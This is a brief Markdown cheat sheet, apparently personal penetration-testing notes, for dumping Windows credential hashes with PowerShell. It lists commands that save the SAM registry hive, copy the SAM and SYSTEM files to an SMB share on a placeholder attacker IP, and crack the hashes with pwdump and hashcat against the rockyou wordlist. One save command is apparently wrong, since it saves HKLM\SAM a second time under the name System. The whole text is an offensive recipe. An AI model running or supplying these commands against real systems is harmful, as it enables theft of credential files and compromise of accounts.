25 lines
528 B
Markdown
25 lines
528 B
Markdown
# Powershell
|
|
|
|
## HashDump
|
|
```sh
|
|
save HKLM\SAM C:\Users\Administrator\Desktop\SAM
|
|
save HKLM\SAM C:\Users\Administrator\Desktop\System
|
|
```
|
|
* Use `samdump2`
|
|
|
|
## Extract Hashes
|
|
* Extract via smb server on attacker
|
|
```
|
|
copy C:\Windows\Repair\SAM \\<attacker-IP>\dir\
|
|
copy C:\Windows\Repair\SYSTEM \\<attacker-IP>\dir\
|
|
```
|
|
* Crack via [creddump7](git clone https://github.com/Tib3rius/creddump7)
|
|
```
|
|
python pwdump.py SYSTEM SAM
|
|
```
|
|
or
|
|
```
|
|
hashcat -m 1000 --force <hash> /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
|
|
```
|
|
|